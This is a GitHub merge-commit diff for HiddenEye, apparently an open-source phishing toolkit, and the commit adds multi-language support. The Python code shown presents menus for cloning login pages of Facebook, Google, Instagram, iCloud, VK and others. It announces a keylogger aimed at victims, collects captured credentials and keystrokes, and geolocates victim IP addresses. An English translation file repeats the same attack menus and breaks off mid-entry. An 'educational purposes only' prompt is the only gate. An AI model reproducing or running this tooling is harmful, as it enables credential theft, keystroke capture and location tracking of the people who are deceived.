Merge pull request #144 from DarkSecDevelopers/stikyt-dev-branch

Stikyt dev branch - Language system update
This commit is contained in:
Artur Tretiak 2018-11-19 20:03:07 +02:00 committed by GitHub
commit 033d289a41
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 1082 additions and 41 deletions

2
.gitignore vendored
View File

@ -26,3 +26,5 @@ Server/www/mobile\.html
Server/www/usernames\.txt Server/www/usernames\.txt
Settings\.ini Settings\.ini
ngrok\.url

View File

@ -9,10 +9,15 @@ from urllib.request import urlopen
from subprocess import check_output from subprocess import check_output
from sys import stdout, argv from sys import stdout, argv
from Defs.Configurations import readConfig, ifSettingsNotExists from Defs.Configurations import readConfig, ifSettingsNotExists
from Defs.Languages import *
checkAndSetLanguage() #WIP!!! MUST BE UPDATED
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m' RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
ifSettingsNotExists() ifSettingsNotExists()
config = readConfig() config = readConfig()
logFile = None logFile = None
didBackground = config.get("Settings","DidBackground") didBackground = config.get("Settings","DidBackground")
for arg in argv: for arg in argv:
@ -69,8 +74,8 @@ def runPhishing(page , customOption): #Phishing pages selection menu
copy_tree("WebPages/VK_poll_method/", "Server/www/") copy_tree("WebPages/VK_poll_method/", "Server/www/")
def selectServer(): #Question where user must select server def selectServer(): #Question where user must select server
print("\n {0}Please select any available server:{1}".format(RED, DEFAULT)) print(_("\n {0}Please select any available server:{1}").format(RED, DEFAULT))
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(RED, DEFAULT)) print(_("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo").format(RED, DEFAULT))
choice = input(" \n {0}HiddenEye >>> {1}".format(RED, DEFAULT)) choice = input(" \n {0}HiddenEye >>> {1}".format(RED, DEFAULT))
@ -121,7 +126,7 @@ def runServeo():
def runMainMenu(): #menu where user select what they wanna use def runMainMenu(): #menu where user select what they wanna use
system('clear') system('clear')
print (''' print (_('''
{1}<=============================================================================> {1}<=============================================================================>
@ -137,36 +142,37 @@ def runMainMenu(): #menu where user select what they wanna use
{0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ] {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ] {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
<=============================================================================> <=============================================================================>
'''.format(GREEN, DEFAULT, CYAN, RED)) ''').format(GREEN, DEFAULT, CYAN, RED))
if 256 != system('which php'): #Checking if user have PHP if 256 != system('which php'): #Checking if user have PHP
print (" -----------------------".format(CYAN, DEFAULT)) print (" -----------------------".format(CYAN, DEFAULT))
print ("[PHP INSTALLATION FOUND]".format(CYAN, DEFAULT)) print (_("[PHP INSTALLATION FOUND]").format(CYAN, DEFAULT))
print (" -----------------------".format(CYAN, DEFAULT)) print (" -----------------------".format(CYAN, DEFAULT))
else: else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(CYAN, DEFAULT)) print (_(" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/").format(CYAN, DEFAULT))
exit(0) exit(0)
for i in range(101): for i in range(101):
sleep(0.05) sleep(0.05)
stdout.write("\r{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%".format(RED, DEFAULT) % i) stdout.write(_("{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%").format(RED, DEFAULT, i))
system("clear")
stdout.flush() stdout.flush()
if input("\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? ({2}y{1}/{0}n{1})\n{2}HiddenEye >>> {1}".format(CYAN, DEFAULT, RED)).upper() != 'Y': #Question where user must accept education purposes if input(_("\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? ({2}y{1}/{0}n{1})\n{2}HiddenEye >>> {1}").format(CYAN, DEFAULT, RED)).upper() != 'Y': #Question where user must accept education purposes
system('clear') system('clear')
print ('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n'.format(RED, DEFAULT)) print (_('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n').format(RED, DEFAULT))
exit(0) exit(0)
option = input("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT)) option = input(_("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
if option == '1': if option == '1':
loadModule('Facebook') loadModule('Facebook')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT)) customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Facebook', customOption) runPhishing('Facebook', customOption)
elif option == '2': elif option == '2':
loadModule('Google') loadModule('Google')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT)) customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Google', customOption) runPhishing('Google', customOption)
elif option == '3': elif option == '3':
loadModule('LinkedIn') loadModule('LinkedIn')
@ -190,7 +196,7 @@ def runMainMenu(): #menu where user select what they wanna use
runPhishing('Twitter', customOption) runPhishing('Twitter', customOption)
elif option == '8': elif option == '8':
loadModule('Instagram') loadModule('Instagram')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT)) customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Instagram', customOption) runPhishing('Instagram', customOption)
elif option == '9': elif option == '9':
loadModule('Snapchat') loadModule('Snapchat')
@ -214,7 +220,7 @@ def runMainMenu(): #menu where user select what they wanna use
runPhishing('Steam', customOption) runPhishing('Steam', customOption)
elif option == '14': elif option == '14':
loadModule('VK') loadModule('VK')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT)) customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('VK', customOption) runPhishing('VK', customOption)
elif option == '15': elif option == '15':
loadModule('iCloud') loadModule('iCloud')
@ -224,14 +230,14 @@ def runMainMenu(): #menu where user select what they wanna use
exit(0) exit(0)
def loadModule(module): #This one just show text.. def loadModule(module): #This one just show text..
print (''' {0} print (_(''' {0}
[{1}*{0}] module loaded. Building site...{0}'''.format(RED, DEFAULT)) [{1}*{0}] module loaded. Building site...{0}''').format(RED, DEFAULT))
def inputCustom(): #Question where user can input custom web-link def inputCustom(): #Question where user can input custom web-link
print("\n (Choose Wisely As Your Victim Will Redirect to This Link)".format(RED, DEFAULT)) print(_("\n (Choose Wisely As Your Victim Will Redirect to This Link)").format(RED, DEFAULT))
print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT)) print(_("\n (Leave Blank To Loop The Phishing Page)").format(RED, DEFAULT))
print("\n {0}Insert a custom redirect url:".format(RED, DEFAULT)) print(_("\n {0}Insert a custom redirect url:").format(RED, DEFAULT))
custom = input("\n {0}CUSTOM URL>>> {1}".format(RED, DEFAULT)) custom = input(_("\n {0}CUSTOM URL>>> {1}").format(RED, DEFAULT))
if 'http://' in custom or 'https://' in custom: if 'http://' in custom or 'https://' in custom:
pass pass
else: else:
@ -262,7 +268,7 @@ def runServer():
def endMessage(): #Message when HiddenEye exit def endMessage(): #Message when HiddenEye exit
system('clear') system('clear')
print (''' print (_('''
{1}_....~~~~=====~~~~...._ {1}_....~~~~=====~~~~...._
.'========={3}/----=\{1}=========> .'========={3}/----=\{1}=========>
/:========={3}/-----====\{1} /:========={3}/-----====\{1}
@ -273,19 +279,19 @@ def endMessage(): #Message when HiddenEye exit
{3}HIDDEN EYE {3}BY: DARKSEC TEAM {3}HIDDEN EYE {3}BY: DARKSEC TEAM
{0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL
{3}https://github.com/DarkSecDevelopers/HiddenEye '''.format(GREEN, DEFAULT, CYAN, RED)) {3}https://github.com/DarkSecDevelopers/HiddenEye ''').format(GREEN, DEFAULT, CYAN, RED))
def getCredentials(): def getCredentials():
print("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n".format(CYAN, DEFAULT)) print(_("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n").format(CYAN, DEFAULT))
while True: while True:
with open('Server/www/usernames.txt') as creds: with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip() lines = creds.read().rstrip()
if len(lines) != 0: if len(lines) != 0:
writeLog('======================================================================'.format(RED, DEFAULT)) writeLog('======================================================================'.format(RED, DEFAULT))
writeLog(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) writeLog(_(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}{2}{1}').format(GREEN, DEFAULT, lines))
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt') system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
writeLog('======================================================================'.format(RED, DEFAULT)) writeLog('======================================================================'.format(RED, DEFAULT))
@ -295,21 +301,21 @@ def getCredentials():
with open('Server/www/ip.txt') as creds: with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip() lines = creds.read().rstrip()
if len(lines) != 0: if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1) ip = re.match('User Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip) resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8')) ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo: if 'bogon' in ipinfo:
log('======================================================================'.format(RED, DEFAULT)) log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) log(_(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}{2}{1}').format(GREEN, DEFAULT, lines))
else: else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc']) matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1) latitude = matchObj.group(1)
longitude = matchObj.group(2) longitude = matchObj.group(2)
writeLog('======================================================================'.format(RED, DEFAULT)) writeLog('======================================================================'.format(RED, DEFAULT))
writeLog(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) writeLog(_(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}{2}{1}').format(GREEN, DEFAULT, lines))
writeLog(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude)) writeLog(_(' \n{0}Longitude: {2} \nLatitude: {3}{1}').format(GREEN, DEFAULT, longitude, latitude))
writeLog(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country'])) writeLog(_(' \n{0}ISP: {2} \nCountry: {3}{1}').format(GREEN, DEFAULT, ipinfo['org'], ipinfo['country']))
writeLog(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city'])) writeLog(_(' \n{0}Region: {2} \nCity: {3}{1}').format(GREEN, DEFAULT, ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt') system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
writeLog('======================================================================'.format(RED, DEFAULT)) writeLog('======================================================================'.format(RED, DEFAULT))
@ -319,7 +325,7 @@ def getCredentials():
lines = creds.read().rstrip() lines = creds.read().rstrip()
if len(lines) != 0: if len(lines) != 0:
writeLog('______________________________________________________________________'.format(RED, DEFAULT)) writeLog('______________________________________________________________________'.format(RED, DEFAULT))
writeLog(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) writeLog(_(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}').format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt') system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
writeLog('______________________________________________________________________'.format(RED, DEFAULT)) writeLog('______________________________________________________________________'.format(RED, DEFAULT))

View File

@ -5,30 +5,34 @@ from os import path, system
from subprocess import check_output from subprocess import check_output
from platform import system as systemos, architecture from platform import system as systemos, architecture
from wget import download from wget import download
from Defs.Languages import *
checkAndSetLanguage() #WIP!!! MUST BE UPDATED
RED, GREEN, DEFAULT = '\033[91m', '\033[1;32m', '\033[0m' RED, GREEN, DEFAULT = '\033[91m', '\033[1;32m', '\033[0m'
def checkConnection(host='http://duckduckgo.com'): #Connection check def checkConnection(host='http://duckduckgo.com'): #Connection check
try: try:
urlopen(host) urlopen(host)
print("{0}Successful connection!{1}".format(GREEN, DEFAULT)) print(_("{0}Successful connection!{1}").format(GREEN, DEFAULT))
return True return True
except: except:
return False return False
if checkConnection() == False: if checkConnection() == False:
print ('''{1} print (_('''{1}
_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
| | | ]__| ]__| |__ | \| {0}|__ || |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1}
{0}[{1}!{0}]{1} Network error. Verify your connection.\n {0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, DEFAULT)) ''').format(RED, DEFAULT))
exit(0) exit(0)
def checkNgrok(): #Ngrok check def checkNgrok(): #Ngrok check
if path.isfile('Server/ngrok') == False: #Is Ngrok downloaded? if path.isfile('Server/ngrok') == False: #Is Ngrok downloaded?
print('[*] Downloading Ngrok...') print(_('[*] Downloading Ngrok...'))
if 'Android' in str(check_output(('uname', '-a'))): if 'Android' in str(check_output(('uname', '-a'))):
filename = 'ngrok-stable-linux-arm.zip' filename = 'ngrok-stable-linux-arm.zip'
else: else:

View File

@ -1 +1,31 @@
#WILL BE SOON!!! #Python3
#WILL BE SOON
#WIP
import gettext
from Defs.Configurations import readConfig
def langRussian():
ru = gettext.translation('hiddeneye',localedir='./locale', languages=['ru'])
ru.install()
def langUkrainian():
uk = gettext.translation('hiddeneye',localedir='./locale', languages=['uk'])
uk.install()
def langEnglish():
en = gettext.translation('hiddeneye',localedir='./locale', languages=['en'])
en.install()
def checkAndSetLanguage():
language = readConfig().get("Settings", "Language")
if language == "en":
langEnglish()
elif language == "ru":
langRussian()
elif language == "uk":
langUkrainian()
else:
langEnglish()

View File

@ -1,20 +1,23 @@
#!/usr/bin/python3 #!/usr/bin/python3
#
#HiddenEye by Open Source Community #HiddenEye by Open Source Community
#
import multiprocessing import multiprocessing
import gettext
from Defs.Checks import * from Defs.Checks import *
from Defs.Configurations import * from Defs.Configurations import *
from Defs.Actions import * from Defs.Actions import *
from Defs.Languages import *
#ru = gettext.translation('hiddeneye',localedir='./locale', languages=['ru'])
#ru.install()
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m' RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
checkAndSetLanguage()
checkConnection() checkConnection()
checkNgrok() checkNgrok()
ifSettingsNotExists() ifSettingsNotExists()
readConfig() readConfig()
config = readConfig()
if __name__ == "__main__": if __name__ == "__main__":

Binary file not shown.

View File

@ -0,0 +1,496 @@
msgid ""
msgstr ""
"Project-Id-Version: hiddeneye\n"
"POT-Creation-Date: 2018-11-19 19:39+0200\n"
"PO-Revision-Date: 2018-11-19 19:42+0200\n"
"Last-Translator: sTiKyt <stikyt@protonmail.com>\n"
"Language-Team: \n"
"Language: en_US\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Poedit 2.2\n"
"X-Poedit-Basepath: ../../../Defs\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
"X-Poedit-SearchPath-0: .\n"
#: Actions.py:77
#, python-brace-format
msgid ""
"\n"
" {0}Please select any available server:{1}"
msgstr ""
"\n"
" {0}Please select any available server:{1}"
#: Actions.py:78
#, python-brace-format
msgid ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
msgstr ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
#: Actions.py:122
#, python-brace-format
msgid ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} BY:DARKSEC{2}\n"
" {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]\n"
" {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY "
"KEYSTROKE ]\n"
"<=============================================================================>\n"
" "
msgstr ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} BY:DARKSEC{2}\n"
" {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]\n"
" {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY "
"KEYSTROKE ]\n"
"<=============================================================================>\n"
" "
#: Actions.py:145
msgid "[PHP INSTALLATION FOUND]"
msgstr "[PHP INSTALLATION FOUND]"
#: Actions.py:148
#, python-brace-format
msgid ""
" --{0}>{1} PHP NOT FOUND: \n"
" {0}*{1} Please install PHP and run me again.http://www.php.net/"
msgstr ""
" --{0}>{1} PHP NOT FOUND: \n"
" {0}*{1} Please install PHP and run me again.http://www.php.net/"
#: Actions.py:153
#, python-brace-format
msgid "{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%"
msgstr "{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%"
#: Actions.py:157
#, python-brace-format
msgid ""
"\n"
"{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? "
"({2}y{1}/{0}n{1})\n"
"{2}HiddenEye >>> {1}"
msgstr ""
"\n"
"{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? "
"({2}y{1}/{0}n{1})\n"
"{2}HiddenEye >>> {1}"
#: Actions.py:159
#, python-brace-format
msgid ""
"\n"
"\n"
"[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR "
"EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n"
"\n"
msgstr ""
"\n"
"\n"
"[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR "
"EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n"
"\n"
#: Actions.py:161
#, python-brace-format
msgid ""
"\n"
"SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:164
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/"
"login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/"
"login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:168
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} New Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} New Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:192
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to "
"original autoliker)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to "
"original autoliker)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:216
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:226
#, python-brace-format
msgid ""
" {0}\n"
" [{1}*{0}] module loaded. Building site...{0}"
msgstr ""
" {0}\n"
" [{1}*{0}] module loaded. Building site...{0}"
#: Actions.py:230
msgid ""
"\n"
" (Choose Wisely As Your Victim Will Redirect to This Link)"
msgstr ""
"\n"
" (Choose Wisely As Your Victim Will Redirect to This Link)"
#: Actions.py:231
msgid ""
"\n"
" (Leave Blank To Loop The Phishing Page)"
msgstr ""
"\n"
" (Leave Blank To Loop The Phishing Page)"
#: Actions.py:232
#, python-brace-format
msgid ""
"\n"
" {0}Insert a custom redirect url:"
msgstr ""
"\n"
" {0}Insert a custom redirect url:"
#: Actions.py:233
#, python-brace-format
msgid ""
"\n"
" {0}CUSTOM URL>>> {1}"
msgstr ""
"\n"
" {0}CUSTOM URL >>> {1}"
#: Actions.py:264
#, python-brace-format
msgid ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
